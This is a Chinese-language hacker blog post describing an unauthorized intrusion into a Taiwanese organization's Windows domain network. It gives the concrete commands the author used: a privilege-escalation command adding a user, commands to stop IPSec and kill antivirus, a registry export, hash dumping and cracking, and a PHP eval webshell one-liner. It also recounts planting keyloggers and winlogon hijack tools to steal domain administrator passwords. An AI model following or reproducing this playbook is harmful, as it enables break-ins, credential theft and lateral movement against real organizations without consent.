渗透某大型域内网

樱花浪子 原始出处:http://blog.hacklu.net
由于平时比较忙,用了很久的VPN肉鸡飞掉了,近来正好有时间于是打开google搜索upfile.asp开始找肉鸡,来了台湾某XX站,http://xxx.xxx.tw/xx/upfile.asp,为了不必要的麻烦,我隐藏了敏感内容。直接到传asp提示错误,那么直接传了gif以后,查看上传路径发现自己重命名了,如果没有重命名的话在IIS6下百分之90以上可以拿shell了,除去目录末有执行脚本权限。最后抓包分析改上传路径,最后得到一个shell,图1。具体方法翻翻以前杂志或google找吧,一找一大堆。

  执行命令后,发现权限还比较大,能够执行一些简单命令,像net user、ipconfig /all等等。图2。不过执行添加用户的肯定是不行了,由于支持ASPX我想起来去年暴的本地提权,直接上传Churrasco.exe,我这里命名为c.exe。运行命令为:/c E:\website\wwwroot\xxx\xxup\c.exe "net user nohack nohack /add"。必须有双引号,双引号里是执行的命令。最后成功加了用户,图3。

  执行netstat -an发现3389开放,很兴奋的连接上去,却提示“无法连接远程计算机”,不应该呀,明明开着3389呢,google了下,一般开了3389无法连接的原因有:1、服务器在内网。用显示的IP来看是用公网IP的,先排除。2、做了tcp/ip筛选。执行CMD命令:cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处,这种原因是查看导出的内容EnableSecurityFilters这个字段里dword后面的键值是否为00000000,如果为00000001就说明管理员做了tcp/ip筛选,我们只要把1改成0就行了。还有两个地方要导出,可是我导出来都是这三个word后面的键值都为00000000看来也不是这种原因。3、做了ip安全策略。执行cmd命令: cmd /c net stop policyagent 将IPSEC Services服务停了它。再连3389。还是连接不上。4、管理员设置的终端登陆权限只有指定的用户可以。这种原因应该是可以连接、无法登录。也排除。5、防火墙。在webshell执行了下tasklist,发现有几个进程比较可疑。如almon.exe、alsvc.exe、SAVAdminService.exe等。图4

  搜索下几个进程名发现是Sophos Anti-Virus(SAV)英国开发的一个杀毒软件,网上好评还不少。莫非是它搞的鬼,看看能不能直接结束掉,结果试了一下还真能结束掉,不过还是连接不上。原因不明中。因为这个网站禁止中国大陆的IP,这期间我试了反弹CMD,反弹IP是美国的一个肉鸡、端口转发等,最后我直接传了一个反弹的远程木马,在WEBSHELL执行,因为我有管理员的权限执行命令了,不过最后都没有弹出来。连http协议都没弹出来,当真是郁闷。

  既然这样还是在webshell里收集一下本机信息吧,执行net view查看有没有其他机器,结果还真有,图5,突然发现自己变笨了,我既然有这台的cmdshell权限,把这台的HASH密码跑出来以后可以连接其他机器呀。何况我这台还是个分站,而主站上面有N个分站,每个IP也都不一样。于是上传pwdump抓了HASH,由于没有彩虾表用LC5跑之。图6。


  接着对整个C段扫了一下3389,结果只有3台机器开放,图7,我拥有权限的是16x.xxx.xxx.99,扫出的一台16x.xxx.xxx.69也开放3389了,接着把这个IP拿到查旁注的网站看了下,结果不少都是分站和一些相关的站。试了一下,可以直接连接,用LC5跑出的一个密码登录,结果显示登录成功,却永久的停在这里,图8,不能继续任何操作,真晕,以前还真没遇到过。

  接着用了administrator的密码登录,这次成功了进入了桌面,执行了ipconfig /all看下大致环境,发现还有DNS服务器,如图9所示。一般DNS服务器也就是域服务器,接着我用net view /domain看了下有几个域。看来我所在的是INTRANE***这个域里面,继续用net view看了下本机所在的域约有多少台机器,如图10所示。用net time /domain探测了下时间服务器,末权限,在用经典的net group "domain admins" /domain同样是末权限,正在想办法如何进行下一步的时候看到桌面有个远端桌面的东东,打开一看里面有管理员保存成着其他机器里的IP,试了一下这个段的其他机器都可以连进去,看来管理员又是用的一卡通,如图11所示。

  加用端口扫描器扫的,这个段一个有20多台机器都开3389了,密码都可以进,不过我还末满足,这么多域呢,继续渗透吧,分析了下情况,现在172.16.1.*的IP段基本都已经搞定了,因为台湾的时间差和大陆几乎一样,为了避免和管理员“撞车”,我决定晚上再行动。到了晚上登录连上去的时候发现管理员果真登录了,有图为证,如图12所示。而且管理员在退出的时候是断开的,并末有注销,接着我开了一个NP写的终端监视脚本,管理员在登录的时候会注销我自己,运气还不错,得到了一台XP系统,接着抓HASH,破密码省略之。


既然管理员用这台管理其他机器,那么我装一个键盘记录工具上去,把akl.exe扔上去了记录一下,一连记录了几天,什么也没记录到,在分析了下,暂时不想用CAIN嗅密码,试着用MS08067溢出,结果显示成功,在telnet的时候失败,郁闷中,图13。IPC连接试下,失败。又过了两天登录上去一看,发现记录到了putty的密码,原来还有unix系统呀,如图14、15所示。不但记录到了putty,还包括网页、信箱之类的。看来这个键盘记录安装的挺成功。接着用putty登录,图16。ls -a列了下目录,netstat -an,查了下端口,发现开了80。我对UNIX的渗透经验不是特别足,先放在一边,直接用echo "<?php @eval($_POST[cmd]);?>">index.php,写进了一个SHELL。


思考一下,溢出、IPC已经试过,嗅探不得已的办法,还有一招末有试,winlogon劫持记录的工具,如图17。这东东可以记录域管理员在本机登录的时的密码,我把我已经控制的所有机器差不多每台一份都中上了这个东东。过了不到一个星期的功夫上去果然记录到了很多密码,如图18。

记我没想到的是,其他域里面具然还有E文系统的机器,最后用其他域管理帐号登录,如图19所示。当我拿下域里的其他域机器的时候并没有太多的兴奋感觉,因为文章所有的都是很常规的技术。写出来做为文档,留给菜鸟、留给自己。
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值